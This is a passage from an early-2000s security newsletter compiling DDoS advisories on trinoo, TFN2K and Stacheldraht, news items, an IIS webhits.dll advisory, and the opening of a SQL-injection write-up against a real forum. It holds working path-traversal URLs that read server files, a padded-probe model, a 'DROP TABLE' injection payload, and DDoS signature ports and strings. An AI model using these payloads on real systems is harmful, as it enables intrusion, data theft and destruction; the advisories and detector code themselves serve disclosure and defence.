If you are involved in a denial of service attack

   Due to the potential magnitude of denial of service attacks generated by distributed networks of tools, the target of an attack may be unable to rely on Internet connectivity for communications during an attack. Be sure your security policy includes emergency out-of-band communications procedures with upstream network operators or emergency response teams in the event of a debilitating attack.

In November 1999, experts addressed issues surrounding distributed-systems intruder tools. The DSIT Workshop produced a paper in which workshop participants examine the use of distributed-system intruder tools and provide information about protecting systems from attack by the tools, detecting the use of the tools, and responding to attacks.

   Results of the Distributed-Systems Intruder Tools Workshop

Acknowledgments

The CERT/CC would like to acknowledge and thank our constituency and our peers for important contributions to the information used in this Incident Note.
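Editor's added example (this is not part of the CERT note, nor code from any of the tools it describes): the note's "establish patterns to look for" advice, turned into a small classifier run over a constructed capture. It keys on exactly what the note gives for trinoo (27665/tcp to the master, 27444/udp carrying "l44" to the daemons, "*HELLO*" and "PONG" on 31335/udp back to the master) and, for TFN, on the one thing its ICMP control channel cannot hide: the master sends echo REPLIES that nobody sent an echo request for, so the script keeps the requests it has seen and flags any reply without a matching (src, dst, id, seq). The packet layout, addresses and payloads in sample_packets() are made up for the demonstration; the ICMP header is parsed with the standard 8-byte layout and the checksum is not checked.

```python
import struct
from collections import namedtuple

# One captured packet as a sniffer or flow log would hand it over.
# proto is "tcp", "udp" or "icmp"; for icmp the payload is the raw ICMP
# message and the two port fields are unused (0).
Packet = namedtuple("Packet", "proto src dst sport dport payload")


def icmp_fields(raw):
    """Split a raw ICMP message into (type, code, ident, seq, data).
    The checksum is not verified; we never key on it."""
    if len(raw) < 8:
        return None
    icmp_type, code, _csum, ident, seq = struct.unpack("!BBHHH", raw[:8])
    return icmp_type, code, ident, seq, raw[8:]


def classify(pkt, pending_echo):
    """Return the names of the IN-99-07 control-channel signatures this packet matches.

    pending_echo holds (replier, requester, id, seq) for every echo request seen so
    far, so an echo reply that nobody asked for stands out: TFN masters drive their
    daemons with exactly such replies, carrying the command in the 16-bit ID field."""
    hits = []
    if pkt.proto == "tcp" and pkt.dport == 27665:
        hits.append("trinoo: intruder -> master control session (27665/tcp)")
    elif pkt.proto == "udp" and pkt.dport == 27444 and b"l44" in pkt.payload:
        hits.append("trinoo: master -> daemon command (27444/udp carrying 'l44')")
    elif pkt.proto == "udp" and pkt.dport == 31335:
        if b"*HELLO*" in pkt.payload:
            hits.append("trinoo: daemon -> master *HELLO* announcement (31335/udp)")
        elif b"PONG" in pkt.payload:
            hits.append("trinoo: daemon -> master PONG (31335/udp)")
    elif pkt.proto == "icmp":
        fields = icmp_fields(pkt.payload)
        if fields is not None:
            icmp_type, _code, ident, seq, data = fields
            if icmp_type == 8:                       # echo request: the reply will
                pending_echo.add((pkt.dst, pkt.src, ident, seq))   # come back swapped
            elif icmp_type == 0:                     # echo reply
                key = (pkt.src, pkt.dst, ident, seq)
                if key in pending_echo:
                    pending_echo.discard(key)        # an ordinary ping answer
                else:
                    hits.append("tfn: unsolicited ICMP echo reply, id=%d, %d data bytes"
                                % (ident, len(data)))
    return hits


def scan(packets):
    """Run classify() over a capture in order; return {packet index: [signatures]}."""
    pending_echo = set()
    findings = {}
    for i, pkt in enumerate(packets):
        hits = classify(pkt, pending_echo)
        if hits:
            findings[i] = hits
    return findings


def icmp(icmp_type, ident, seq, data=b""):
    """Build a raw ICMP message for the constructed sample (checksum left as zero)."""
    return struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + data


def sample_packets():
    """Constructed capture: four control-channel packets among ordinary traffic.
    Addresses and payloads are made up; only the ports, strings and ICMP
    types from the incident note carry meaning."""
    return [
        Packet("udp", "10.0.0.5", "10.0.0.1", 40000, 53, b"\x00\x01\x01\x00"),            # 0 plain DNS
        Packet("tcp", "198.51.100.7", "10.0.0.20", 3344, 27665, b"<password>\r\n"),      # 1 intruder -> master
        Packet("udp", "10.0.0.20", "10.0.0.31", 1025, 27444, b"cmd l44 203.0.113.9"),     # 2 master -> daemon
        Packet("udp", "10.0.0.31", "10.0.0.20", 1026, 31335, b"*HELLO*"),                # 3 daemon checks in
        Packet("icmp", "10.0.0.9", "10.0.0.1", 0, 0, icmp(8, 0x4242, 1, b"ping")),       # 4 normal echo request
        Packet("icmp", "10.0.0.1", "10.0.0.9", 0, 0, icmp(0, 0x4242, 1, b"ping")),       # 5 its reply: ignored
        Packet("icmp", "10.0.0.20", "10.0.0.31", 0, 0, icmp(0, 456, 0, b"203.0.113.9")), # 6 reply with no request
    ]


if __name__ == "__main__":
    for index, names in sorted(scan(sample_packets()).items()):
        print("packet %d: %s" % (index, "; ".join(names)))
```

The string matches are brittle on purpose: the note itself says the ports, the "l44" token and the ICMP ID values are compile-time choices, so a rebuilt daemon will not trip them. The unsolicited-echo-reply rule is the one that survives recompilation, and it is also the one that needs state (the request table) and so belongs on a sensor that sees both directions of traffic.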
This document is available from: http://www.cert.org/incident_notes/IN-99-07.html

Articles of interest:

   Characterizing and Tracing Packet Floods Using Cisco Routers
   http://www.cisco.com/warp/public/707/22.html

   Improving Security on Cisco Routers
   http://www.cisco.com/warp/public/707/21.html

   Internet Security Advisories:
   http://www.cisco.com/warp/public/707/advisory.html

Additional info, ISS advisory on Trinoo/Tribe variants:

-----BEGIN PGP SIGNED MESSAGE-----

ISS Security Alert
February 9, 2000

Denial of Service Attack using the TFN2K and Stacheldraht programs

Synopsis:

A new form of Distributed Denial of Service (DDoS) attack has been discovered following the release of the trin00 and Tribe Flood Network (TFN) denial of service programs (see December 7, 1999 ISS Security Alert at http://xforce.iss.net/alerts/advise40.php3). These attacks are more powerful than any previous denial of service attack observed on the Internet. A Distributed Denial of Service attack is designed to bring a network down by flooding target machines with large amounts of traffic. This traffic can originate from many compromised machines, and can be managed remotely using a client program. ISS X-Force considers this attack a high risk since it can potentially impact a large number of organizations. DDoS attacks have proven to be successful and are difficult to defend against.

Description:

Over the last two months, several high-capacity commercial and educational networks have been affected by DDoS attacks. In addition to the trin00 and TFN attacks, two additional tools are currently being used to implement this attack: TFN2K and Stacheldraht. Both of these tools are based on the original TFN/trin00 attacks described in the December ISS Security Alert. Attackers can install one of these DDoS programs (trin00, TFN, TFN2K, or Stacheldraht) on hundreds of compromised machines and direct this network of machines to initiate an attack against single or multiple victims.
This attack occurs simultaneously from these machines, making it more dangerous than any DoS attack launched from a single machine.

Technical Information:

TFN2K:

The TFN2K distributed denial of service system consists of a client/server architecture.

The Client:

The client is used to connect to master servers, which can then perform specified attacks against one or more victim machines. Commands are sent from the client to the master server within the data fields of ICMP, UDP, and TCP packets. The data fields are encrypted using the CAST algorithm and base64 encoded. The client can specify the use of random TCP/UDP port numbers and source IP addresses. The system can also send out "decoy" packets to non-target machines. These factors make TFN2K more difficult to detect than the original TFN program.

The Master Server:

The master server parses all UDP, TCP, and ICMP echo reply packets for encrypted commands. The master server does not use a default password; the password is selected by the user at compile time.

The Attack:

The TFN2K client can be used to send various commands to the master for execution, including commands to flood a target machine or set of target machines within a specified address range. The client can send commands using UDP, SYN, ICMP echo, and ICMP broadcast packets. These flood attacks cause the target machine to slow down because of the processing required to handle the incoming packets, leaving little or no network bandwidth. Possible methods for detection of these flooding attacks are recommended in the TFN/trin00 December 7, 1999 ISS Security Alert. TFN2K can also be used to execute remote commands on the master server and bind shells to a specified TCP port. TFN2K runs on Linux, Solaris, and Windows platforms.

Stacheldraht (Barbed Wire):

Stacheldraht consists of three parts: the master server, client, and agent programs.

The Client:

The client is used to connect to the master server on port 16660 or port 60001.
Packet contents are blowfish encrypted using the default password "sicken", which can be changed by editing the Stacheldraht source code. After entering the password, an attacker can use the client to manage Stacheldraht agents, IP addresses of attack victims, lists of master servers, and to perform DoS attacks against specified machines.

The Master Server:

The master server handles all communication between client and agent programs. It listens for connections from the client on port 16660 or 60001. When a client connects to the master, the master waits for the password before returning information about agent programs to the client and processing commands from the client.

The Agent:

The agent listens for commands from master servers on port 65000. In addition to this port, master server/agent communications are also managed using ICMP echo reply packets. These packets are transmitted and replied to periodically. They contain specific values in the ID field (such as 666, 667, 668, and 669) and corresponding plaintext strings in the data fields (including "skillz", "ficken", and "spoofworks"). The ICMP packets act as a "heartbeat" between agent and master server, and to determine source IP spoofing capabilities of the master server. The agent identifies master servers using an internal address list, and an external encrypted file containing master server IP addresses. Agents can be directed to "upgrade" themselves by downloading a fresh copy of the agent program and deleting the old image, as well as accepting commands to execute flood attacks against target machines.

The Attack:

Like TFN/TFN2K, Stacheldraht can be used to perform ICMP, SYN, and UDP flood attacks. The attacks can run for a specified duration, and SYN floods can be directed to a set of specified ports. These flood attacks cause the target machine to slow down because of the processing required to handle the incoming packets, leaving little or no network bandwidth.
Possible methods for detection of these flooding attacks are discussed in the TFN/trin00 ISS Security Alert published December 7, 1999. Stacheldraht runs on Linux and Solaris machines.

Detecting TFN2K/Stacheldraht related attacks:

ISS SAFEsuite intrusion detection solution, RealSecure, detects the Denial of Service attacks that these distributed tools use, providing early warning and response capabilities. RealSecure can reconfigure firewalls and routers to block the traffic. On some firewalls this can be as granular as blocking a particular service or protocol port. In conjunction with the December 7, 1999 ISS Security Alert, RealSecure 3.2.1 included signatures to detect the communications between the distributed components of TFN and trin00. RealSecure will add signatures to detect TFN2K and Stacheldraht in its next release, which will also include an X-press Update capability to speed future signature deployment.

Additional Information:

ISS worked in coordination with CERT, SANS, and the NIPC. The following is additional information regarding these DDoS attacks:

- Advisory CA-2000-01 Denial-of-Service Developments
  http://www.cert.org/advisories/CA-2000-01.html
- SANS Network Security Digest Vol. 4 No. 1 - January 17, 2000
- http://www.fbi.gov/nipc/trinoo.htm
- http://staff.washington.edu/dittrich/misc/stacheldraht.analysis

About ISS

ISS is a leading global provider of security management solutions for e-business. By offering best-of-breed SAFEsuite(tm) security software, comprehensive ePatrol(tm) monitoring services, and industry-leading expertise, ISS serves as its customers' trusted security provider protecting digital assets and ensuring the availability, confidentiality and integrity of computer systems and information critical to e-business success. ISS' security management solutions protect more than 5,000 customers including 21 of the 25 largest U.S.
commercial banks, 9 of the 10 largest telecommunications companies and over 35 government agencies. Founded in 1994, ISS is headquartered in Atlanta, GA, with additional offices throughout North America and international operations in Asia, Australia, Europe and Latin America. For more information, visit the ISS Web site at www.iss.net or call 888-901-7477.

Copyright (c) 2000 by Internet Security Systems, Inc.

Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Alert in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission.

Disclaimer

The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

X-Force PGP Key available at: http://xforce.iss.net/sensitive.php3 as well as on MIT's PGP key server and PGP.com's key server.

Please send suggestions, updates, and comments to: X-Force xforce@iss.net of Internet Security Systems, Inc.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv

iQCVAwUBOKHygjRfJiV99eG9AQGLhQP+L2H4KNHtP2Tl9YT3P5OIkbSrIszC8lW/
iDM8+6wkz0POcjNDXNHNDpVb203Yv+tjdBu/q6cP7QYVeZ9PUElUfXcN6a4bJTpH
OOaARlvyPRFiArxvFgdIbypsFhTWxc4blJOMb8rbBZgzEa7pZiBzZQibN54l3E1A
vg77CCVq3W8=
=sMAK
-----END PGP SIGNATURE-----

@HWA

09.0 Teen charged with hacking
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.mercurycenter.com/svtech/news/indepth/docs/hacker012700.htm

Student charged with hacking
Fugitive: Prosecutors say he broke into Palo Alto firm, then fled to Bulgaria.
BY HOWARD MINTZ
Mercury News Staff Writer

A federal grand jury in San Jose on Wednesday indicted a former Princeton University student suspected of hacking into the computer system of a Palo Alto e-commerce company and stealing nearly 2,000 credit card numbers.

In the government's latest attempt to hunt down a computer hacker, federal prosecutors brought charges against Peter Iliev Pentchev, a 22-year-old native of Bulgaria who is believed to have fled the United States after school officials confronted him about his computer activities.

According to the U.S. Attorney's office in San Jose, Pentchev left the country in late 1998, shortly after the alleged hacking incident occurred. Law enforcement officials believe Pentchev went to Bulgaria and were unclear Wednesday what diplomatic obstacles there may be to returning him to this country to face charges.

The four-count indictment charges Pentchev with violating federal computer laws by hacking into an undisclosed Palo Alto company between Nov. 20 and Dec. 19, 1998, stealing at least 1,800 credit card numbers, as well as user names and passwords of that company's customers.

The indictment does not specify the company, and federal officials declined to name it. But Assistant U.S. Attorney Mavis Lee, who is prosecuting the case, said the hacking incident shut down one of the company's Web servers for five days and caused enough chaos in its database that it cost the firm more than $100,000 to restore its security system.

Authorities have no evidence that Pentchev used the credit card numbers to commit fraud.

Federal law-enforcement officials do not believe there is a link between Pentchev and a computer intruder who earlier this month attempted to extort $100,000 from Internet music retailer CD Universe, claiming to have stolen as many as 300,000 credit card numbers. The alleged extortionist was suspected of operating somewhere in Eastern Europe.
That hacker began posting more than 25,000 allegedly stolen card numbers on a web site Christmas Day. The site eventually was shut down, and thousands of customers who had shopped at CD Universe canceled their cards.

In the Bay Area case, investigators said they were able to trace the computer intrusion to Pentchev because he left evidence in log files in the company's computer system. "He wasn't careful about mopping up after himself," Lee said.

Princeton University officials confronted Pentchev about the allegations in December 1998, and he disappeared shortly thereafter.

If convicted, Pentchev faces a maximum penalty of 17 years in prison.

Contact Howard Mintz at hmintz@sjmercury.com or (408) 286-0236.

@HWA

10.0 Major security flaw found on Microsoft product
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exclusive: Major security flaw hits Microsoft
http://www.zdnet.co.uk/news/2000/3/ns-12942.html
Thu, 27 Jan 2000 17:03:47 GMT
Will Knight

More embarrassment for Microsoft security as yet another flaw is discovered. Will Knight brings you this exclusive report.

A British security expert claims to have uncovered a major security flaw in Microsoft's Web server software, Internet Information Server 4 (IIS).

David Litchfield, a Windows NT specialist with British firm Cerberus Information Security, says the latest exploit against a Microsoft product allows a malicious hacker to gain unauthorised access to sensitive files, including cached or stored credit card details, address information, user IDs and passwords.

Of most concern is the way these details can be seized: typing a simple URL into any browser makes it possible to gain access to files on Web servers running IIS that have not been specifically configured to disable the exploit.

According to Litchfield, the situation is serious. "It takes no expertise [to use this technique] at all. It's so easy to exploit, I dare not give out a specific example.
It would just fall into the hands of script kiddies [a copycat who uses someone else's techniques to hack a system]." ZDNet UK News has a copy of the exploit technique.

Thousands of e-commerce Web sites use IIS, prompting Litchfield to warn a number of high profile UK e-commerce sites he believed were vulnerable.

Last year Microsoft suffered a major PR blow when its Hotmail service -- the world's leading Web based email service -- was left open to attack by a similarly simple hacking technique.

But it is not just Microsoft's products that are vulnerable to attack: there have been several security breaches of high-profile e-commerce Web sites illustrating the precarious nature of the fledgling technology. Visa, for example, recently confirmed receiving ransom demands from individuals claiming to be able to bring down their computer system. E-commerce Web site CDUniverse was also struck by a computer hacker who stole hundreds of credit card numbers and published them on the Internet.

Mark Tennant, Microsoft product manager for NT Server, told ZDNet UK News on Thursday that although Microsoft products had made headlines recently for their security flaws, it was to be expected. "This product is a mainstream product with millions of users, obviously with that many users flaws are more likely to be picked up."

Ostensibly that might be true, but to observers, those who see Microsoft products hacked time and again, isn't it a worrying pattern? Tennant disagrees and drew comparisons with Linux "which doesn't have millions of users so you therefore don't hear of this type of issue". He added: "Microsoft is completely committed to security."

Asked if that commitment could guarantee Windows 2000 -- NT's big brother, due next month -- would not suffer the same sort of security flaws as its predecessor, Tennant said: "I cannot predict what could happen a month down a line... but we are committed to security."
Litchfield suggests the pressure put on organisations to get online, by both government and software houses, has led to companies leaving themselves wide open to computer criminals. "The World Wide Web is a hacker's paradise," he remarks. "The lure of e-commerce as an effective channel to further promote a business and fuel its success has led to too many companies getting 'connected' too quickly, sacrificing security for speed."

Security consultant Neil Barrett from another security firm, UK Information Risk Management, agrees: "The Holy Grail to any hacker is the remote access exploit. In the past problems with IIS have mainly been denial of service. If this exploit does what it says it does, it's down to how well credit card details are protected on a system which we know from experience is not very well at all."

As a first defence Barrett advises either an intrusion detection system or encryption, or ideally "both".

Full details of the exploit are available from the Cerberus Web site at this address: http://www.cerberus-infosec.co.uk/adviishtw.html and a patch for Internet Information Server 4 may be downloaded from the Microsoft security home page.
@HWA

11.0 Cerberus Information Security Advisory (CISADV000126)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: win2k security list
Date: Jan 26th

Cerberus Information Security Advisory (CISADV000126)
http://www.cerberus-infosec.co.uk/advisories.html

Released           : 26th January 2000
Name               : Webhits.dll buffer truncation
Affected Systems   : Microsoft Windows NT 4 running Internet Information Server 4, all Service Packs
Issue              : Attackers can access files outside of the web virtual directory system and view ASP source
Author             : David Litchfield (mnemonix@globalnet.co.uk)
Microsoft Advisory : http://www.microsoft.com/technet/security/bulletin/ms00-006.asp

Internet Information Server 4.0 ships with an ISAPI application, webhits.dll, that provides hit-highlighting functionality for Index Server. Files that have the extension .htw are dispatched by webhits.dll. A vulnerability exists in webhits, however, that allows an attacker to break out of the web virtual root file system and gain unauthorized access to other files on the same logical disk drive, such as customer databases, log files or any file they know or can ascertain the path to. The same vulnerability can be used to obtain the source of Active Server Pages or any other server side script file, which often contain UserIDs and passwords as well as other sensitive information.

*** WARNING ****

Even if you have no .htw files on your system you're probably still vulnerable!

A quick test to show if you are vulnerable: go to

   http://YOUR_WEB_SERVER_ADDRESS_HERE/nosuchfile.htw

If you receive a message stating the "format of the QUERY_STRING is invalid" you _are_ vulnerable.

Cerberus Information Security's free vulnerability scanner - CIS - now contains a check for this issue - available from the website http://www.cerberus-infosec.co.uk/

*** WARNING ****

Details
*******

This vulnerability exploits two problems and for the sake of clarity this section will be split into two.
1) If you DO have .htw files on your system
********************************************

The hit-highlighting functionality provided by Index Server allows a web user to have a document returned with their original search terms highlighted on the page. The name of the document is passed to the .htw file with the CiWebHitsFile argument. webhits.dll, the ISAPI application that deals with the request, opens the file, highlights accordingly and returns the resulting page. Because the user has control of the CiWebHitsFile argument passed to the .htw file they can request pretty much anything they want. A secondary problem to this is that the source of ASP and other scripted pages can be revealed too. Worse, webhits.dll will follow double dots and so an attacker is able to gain access to files outside of the web virtual root. For example, to view the web access logs for a given day the attacker would build the following URL:

   http://charon/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full

Sample .htw files often installed and left on the system are

   /iissamples/issamples/oop/qfullhit.htw
   /iissamples/issamples/oop/qsumrhit.htw
   /iissamples/exair/search/qfullhit.htw
   /iissamples/exair/search/qsumrhit.htw
   /iishelp/iis/misc/iirturnh.htw (this .htw is normally restricted to loopback)

2) If you DON'T have any .htw files on your system
**************************************************

To invoke the webhits.dll ISAPI application a request needs to be made to a .htw file, but if you don't have any on your web server you might wonder why you are still vulnerable: requesting a non-existent .htw file will fail. The trick is to be able to get inetinfo.exe to invoke webhits.dll but then also get webhits.dll to access an existing file. We achieve this by crafting a special URL. First we need a valid resource. This must be a static file such as a .htm, .html, .txt or even a .gif or a .jpg.
This will be the file opened by webhits.dll as the template file. Now we need to get inetinfo.exe to pass it along to webhits for dispatch, and the only way we can do this is by requesting a .htw file.

http://charon/default.htm.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full

will fail. Obviously: there is no such file on the system with that name. Notice, however, that we've now invoked webhits, and by placing a specific number of spaces (%20s) between the existing resource and the .htw it is then possible to trick the web service. The buffer that holds the name of the .htw file to open is truncated, causing the .htw part to be removed, so when webhits.dll attempts to open the file it succeeds and we are returned the contents of the file we want to access without there actually being a real .htw file on the system. The code is probably doing something similar to this:

FILE *fd;

int DoesTemplateExist(char *pathtohtwfile)
{
    // Just in case inetinfo.exe passes too long a string
    // let's make sure it's of a suitable length and not
    // going to open a buffer overrun vulnerability
    char *file;
    file = (char *)malloc(250);
    strncpy(file,pathtohtwfile,250);
    fd = fopen(file,"r");
    // Success
    if(fd !=NULL)
    {
        return 1;
    }
    // failed
    else
    {
        return 0;
    }
}

Here webhits.dll "contains" a function called DoesTemplateExist() that is passed a pointer to a 260-byte string buffer containing the path to the .htw file to open, but this buffer is further reduced in length by the strncpy() call, which discards whatever was stored in the last ten bytes (in this case the .htw of the HTTP REQUEST_URI), so when fopen() is called it succeeds. This works because Windows NT ignores trailing spaces in a file name, so the padded name resolves to the real static file. Note that the extension check and the file open are done on two different strings: inetinfo.exe sees ".htw" and picks webhits.dll, while webhits.dll opens a name that no longer ends in ".htw".

Solution
********

.htw needs to be unassociated from webhits.dll. To do this open the Internet Server Manager (MMC).
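The following is an added model of the truncation, not code from the advisory or from Microsoft. The buffer sizes (a 260-byte path handed over by inetinfo.exe, a 250-byte strncpy() destination inside webhits.dll) are taken from the advisory's sketch and are assumptions; the web root and the hardened check are constructed for the illustration.

```python
"""Model of the webhits.dll name truncation described in CISADV000126.
Added example: sizes and file names are assumptions, see the lead-in."""

HTW_SUFFIX = ".htw"
URI_BUF = 260       # assumed length of the path buffer inetinfo.exe passes along
TEMPLATE_BUF = 250  # assumed size of the strncpy() destination in webhits.dll


def build_probe_path(existing_file, uri_len=URI_BUF):
    """Pad a real static resource with spaces so that '.htw' occupies exactly
    the last bytes of a uri_len-byte path.  This is the shape behind the
    'specific number of spaces' the advisory mentions."""
    pad = uri_len - len(existing_file) - len(HTW_SUFFIX)
    if pad < 0:
        raise ValueError("resource name too long to pad into the buffer")
    return existing_file + " " * pad + HTW_SUFFIX


def inetinfo_dispatch(path):
    """inetinfo.exe chooses the ISAPI handler from the extension it sees."""
    return "webhits.dll" if path.lower().endswith(HTW_SUFFIX) else "static"


def strncpy_truncate(src, n):
    """What the destination holds after strncpy(dst, src, n): the first n
    characters; everything beyond them is silently dropped."""
    return src[:n]


def nt_open_name(name):
    """Windows NT ignores trailing spaces in a file name (per the advisory)."""
    return name.rstrip(" ")


def does_template_exist_vulnerable(path, files):
    """The advisory's sketch of DoesTemplateExist(): truncate, then open."""
    opened = nt_open_name(strncpy_truncate(path, TEMPLATE_BUF))
    return opened if opened in files else None


def does_template_exist_fixed(path, files):
    """Hardened variant (assumption, not the vendor fix): refuse paths that
    do not fit the buffer, and require that the name actually opened still
    carries the extension that caused the dispatch."""
    if len(path) >= TEMPLATE_BUF:
        return None
    opened = nt_open_name(path)
    if not opened.lower().endswith(HTW_SUFFIX):
        return None
    return opened if opened in files else None


# Constructed web root: one static page and no .htw file anywhere.
WEBROOT = {"/default.htm"}


def demo():
    probe = build_probe_path("/default.htm")
    return {
        "handler": inetinfo_dispatch(probe),
        "vulnerable": does_template_exist_vulnerable(probe, WEBROOT),
        "fixed": does_template_exist_fixed(probe, WEBROOT),
    }


if __name__ == "__main__":
    print(demo())
```

With the assumed sizes the probe is "/default.htm", 244 spaces, ".htw": inetinfo.exe dispatches it to webhits.dll because of the suffix, strncpy() keeps only the first 250 bytes (the name plus spaces), and the trailing-space rule turns that into "/default.htm", which exists. The hardened variant rejects the same request because it never opens a name that differs from the one whose extension was checked.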
In the left-hand pane right-click the computer you wish to administer and from the pop-up menu choose Properties. From the Master Properties select the WWW Service and then click Edit. The WWW Service Master Properties window should open. From here click on the Home Directory tab and then click the Configuration button. You should be presented with an App Mappings tab in the Application Mappings window. Find the .htw extension, highlight it, then click Remove. If a confirmation window pops up select Yes to remove. Finally click Apply, select all of the child nodes this should apply to, and OK that. Now close all of the WWW Service property windows. Afterwards, repeat the quick test given above: a request for a non-existent .htw file should no longer return the QUERY_STRING error.

About Cerberus Information Security, Ltd
****************************************

Cerberus Information Security, Ltd, a UK company, are specialists in penetration testing and other security auditing services. They are the developers of CIS (Cerberus' Internet Security scanner), available for free from their website: http://www.cerberus-infosec.co.uk

To ensure that the Cerberus Security Team remains one of the strongest security audit teams available globally they continually research operating system and popular service software vulnerabilities, leading to the discovery of "world first" issues. This not only keeps the team sharp but also helps the industry and vendors as a whole, ultimately protecting the end consumer. As testimony to their ability and expertise one just has to look at exactly how many major vulnerabilities have been discovered by the Cerberus Security Team: over 40 to date, making them a clear leader of companies offering such security services.

Founded in late 1999 by Mark and David Litchfield, Cerberus Information Security, Ltd are located in London, UK but serve customers across the world.
For more information about Cerberus Information Security, Ltd please visit their website or call on +44(0) 181 661 7405

Permission is hereby granted to copy or redistribute this advisory but only in its entirety.

Copyright (C) 2000 by Cerberus Information Security, Ltd

_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net

@HWA

12.0 "How I hacked Packetstorm Security" by Rainforest Puppy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-- Advisory RFP2K01 ------------------------------ rfp.labs ------------

"How I hacked PacketStorm"
A look at hacking wwwthreads via SQL

------------------------------- rain forest puppy / rfp@wiretrip.net ---

Table of contents:
-1. Scope of problem
-2. Long explanation of SQL hacking
-3. Solution
-4. Conclusion
-5. Included perl scripts

------------------------------------------------------------------------

----[ 1. Scope of problem

Many applications are vulnerable to various forms of SQL hacking. While programmers know they should avoid strcpy() and giving user data to a system() call, many are unaware of how SQL queries can be tampered with. This is more of a technical paper than an advisory, but it does explain how I used a vulnerability in the wwwthreads package to gain administrative access and some 800 passwords to PacketStorm's discussion forum.

----[ 2. Long explanation of SQL hacking

As with any other day, I was surfing around the PacketStorm forums, which use wwwthreads. The URL parameters (the cruft after the '?' in a URL) of the forums started catching my eye. Being the web security puppy I am, I started getting curious. So, using an ultra-insightful hacking technique, I changed the 'Board=general' parameter to read 'Board=rfp' used with the showpost.pl script.
Lo and behold, I get the following error given to me:

We cannot complete your request. The reason reported was: Can't execute query: SELECT B_Main,B_Last_Post FROM rfp WHERE B_Number=1 . Reason: Table 'WWWThreads.rfp' doesn't exist

Seeing there's also a 'Number=1' parameter, we can figure this query can be reconstructed as

SELECT B_Main,B_Last_Post FROM $Board WHERE B_Number=$Number

Now, if any of you have read my Phrack 54 article (the SQL appension part, available at http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=2) you can see where I'm going. We can not only substitute a $Board name and $Number, but also extra SQL commands. Imagine if $Board were to equal

'general; DROP TABLE general; SELECT * FROM general '

This would translate into

SELECT B_Main,B_Last_Post FROM general; DROP TABLE general; SELECT * FROM general WHERE B_Number=$Number

Now, the ';' is generic for ending a command. Normally we could use a '#' to make MySQL ignore everything else on the line; however, the 'FROM' clause is on a separate line from the 'WHERE' clause, so MySQL won't ignore it. Considering that invalid SQL will cause MySQL to not run any commands, we at least need to give it a valid command string to parse... in this case, we feed a generic SELECT (similar to the original) back to it. The result of this (theoretically) is to drop (delete) the general forum table.

But in reality, it doesn't work. Not because the theory is wrong, but because the database user we're using doesn't have DROP privileges. And due to how wwwthreads is written, it won't quite let you do much with this. But all is not lost: we can just start changing all numbers left and right, looking for where it blows up... or we can go the easy route and download the (eval) source code from www.wwwthreads.com. Yeah, kind of cheating, but it's not quite a one-to-one solution. You see, the eval code and the licensed code (which PacketStorm is running) are slightly different, including their SELECT statements.
So we have to be a little creative. First, let's find the SELECT statement (or equivalent) that's featured above. I like to use less, so I just 'less showpost.pl' and search (the '/' key) for 'SELECT'. We come up with

# Grab the main post number for this thread
$query = qq!
    SELECT Main,Last_Post
    FROM $Board
    WHERE Number=$Number
!;

Wow, that's it... except the field names (Main,Last_Post,Number) are different from the pro version (B_Main,B_Last_Post,B_Number). If we look right above it, we see

# Once and a while it people try to just put a number into the url,
if (!$Number) {
    w3t::not_right("There was a problem looking up the Post...

which is what limits the use of the $Number parameter.

At this point let's evaluate 'why' we want to go forth into this. Obviously DROP'ing tables ranks right up there with other stupid DoS tricks. You may be able to modify other people's posts, but that's lame too. Perhaps setting up our own forum? All that information is stored in the DB. But that's a lot of records to update. How about becoming a moderator? Or even better, an administrator? Administrators can add, delete, and modify forums, boards, and users. That may be a worthy goal, although you're still only limited to the realm of the forum, which makes you king of a very small and pitiful domain.

However, there is one thing worthy. If you make yourself a user account, you'll notice you have to enter a password. Hmmm... those passwords are stored someplace... like, in the database. If we hedge our 'password reuse' theory, and combine it with the fact that wwwthreads (in some configurations) posts the IP address of the poster, we have some possibilities worth checking out.

So, let's look at this password thing. Going into 'edit profile' gives us a password field, which looks an awful lot like a crypt hash (view the HTML source). Damn, so the passwords are hashed. Well, that just means you'll need a password cracker and more time before you can start checking on password reuse.
Assuming we *can* get the passwords...

Let's start with the administrator access first. The adduser.pl script is a good place to start, since it should show us all parameters of a user. Notice the following code

# --------------------------------------
# Check to see if this is the first user
$query = qq!
    SELECT Username
    FROM Users
!;
$sth = $dbh -> prepare ($query) or die "Query syntax error: $DBI::errstr. Query: $query";
$sth -> execute() or die "Can't execute query: $query. Reason: $DBI::errstr";
my $Status = "";
my $Security = $config{'user_security'};
my $rows = $sth -> rows;
$sth -> finish;

# -------------------------------------------------------
# If this is the first user, then status is Administrator
# otherwise they are just get normal user status.
if (!$rows){
    $Status = "Administrator";
    $Security = 100;
}
else {
    $Status = "User";
}

What this does is look to see if any users are defined. If no users are defined, the first user added gets the Status of 'Administrator' and a security level of 100. After that, all added users just get Status=User. So we need to find a way to make our Status=Administrator. A full user record can be seen a little further down...

# ------------------------------
# Put the user into the database
my $Status_q   = $dbh -> quote($Status);
$Username_q    = $dbh -> quote($Username);
my $Email_q    = $dbh -> quote($Email);
my $Display_q  = $dbh -> quote($config{'postlist'});
my $View_q     = $dbh -> quote($config{'threaded'});
my $EReplies_q = $dbh -> quote("Off");
$query = qq!
    INSERT INTO Users (Username,Email,Totalposts,Laston,Status,Sort,
